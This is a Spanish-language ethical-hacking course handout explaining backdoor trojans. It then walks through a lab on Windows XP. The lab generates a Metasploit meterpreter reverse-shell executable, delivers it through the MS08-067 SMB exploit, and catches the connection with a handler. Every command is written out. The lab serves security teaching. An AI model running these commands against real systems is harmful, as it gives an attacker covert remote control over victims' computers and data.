FUNDAMENTOS DE SEGURIDAD Y HACKING ETICO Profesor: Luis Alfonso Jiménez Piedrahita Backdoor Puertas Traseras Hoy en día, las puertas traseras son el tipo de troyanos más peligroso y difundido. Estos troyanos son utilitarios de administración remota que someten los equipos infectados a un control externo por medio de la red local o Internet. Su forma de funcionamiento es similar a la de los programas de administración remota (a distancia) usados por los administradores de sistemas. Esto hace que sea difícil detectarlos. La única diferencia entre una herramienta de administración legal y una puerta trasera es que éstas se instalan sin que el usuario lo sepa y sin su consentimiento. Cuando la puerta trasera es ejecutada, empieza a monitorear el sistema local sin que el usuario lo note. Con frecuencia la puerta trasera no figura en el log de los programas activos. Una vez que un utilitario de administración a distancia se instala y ejecuta, el equipo de la víctima queda a disposición del agresor. Las puertas traseras pueden: Enviar y recibir archivos Activar y eliminar archivos Ejecutar archivos Mostrar notificaciones Borrar datos Reiniciar el computador En otras palabras, los autores de virus usan las puertas traseras para detectar y bajar información confidencial, ejecutar código malicioso, destruir datos, incluir el computador en redes bot, etc. En resumen, las puertas traseras combinan la funcionalidad de la mayoría de tipos de troyanos en un solo paquete. Las puertas traseras tienen una subclase particularmente peligrosa: las variantes que pueden propagarse como gusanos. La única diferencia es que los gusanos están programados para propagarse constantemente, en tanto que las puertas traseras móviles se propagan únicamente al recibir una instrucción específica de su "amo". Generar Backdoors desde BackTrack 1. Abrimos una ventana de terminal en Backtrack. 2. Escribimos el siguiente código en la consola msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.100 LPORT=4444 x > noabrir.exe Con lo anterior estamos creando un archive llamado noabrir.exe con los datos de mi BackTrack, de tal manera que cuando el objetivo (victima) ejecute el archivo, nos envíe la información del pc. El resultado lo vemos en la siguiente pantalla. FUNDAMENTOS DE SEGURIDAD Y HACKING ETICO Profesor: Luis Alfonso Jiménez Piedrahita Este archivo queda almacenado en el /root. Inyección del BackDoor al Objetivo (Victima) Después de crear el BackDoor, se procede a pasarle al objetivo este archivo y colocarlo en una parte del pc de tal forma que se vea y lo ejecute en cualquier momento… Para efectos del ejercicio, realizaremos una intrusión a Windows XP y colocaremos este archivo en el escritorio para ser ejecutado posteriormente. Proceso: 1. 2. 3. 4. 5. 6. 7. 8. msfconsole use exploit/windows/smb/ms08_067_netapi set rhost 192.168.100.200 set rport 445 set lhost 192.168.100.100 set payload windows/meterpreter/reverse_tcp exploit upload noabrir.exe C:\\”Documents and Settings”\\Administrador\\Escritorio Ejecutar el Exploit Luego de pasar el archivo al Objetivo (victima), procedemos a ejecutar el Exploit que nos va a permitir capturar los datos del pc cuando se ejecute el archivo. FUNDAMENTOS DE SEGURIDAD Y HACKING ETICO Profesor: Luis Alfonso Jiménez Piedrahita use exploit/multi/handler y ENTER. set LHOST 192.168.100.100 y ENTER. set LPORT 4444 y ENTER. exploit Ejecución del Archivo por parte del Objetivo (Victima) Lo único que no falta es que el Objetivo ejecute el archivo y si no hay ningún inconveniente, nos dará una conexión meterpreter al objetivo. Con esto ya tenemos acceso al objetivo y podemos realizar lo que se necesite realizar en este equipo… Muchos Éxitos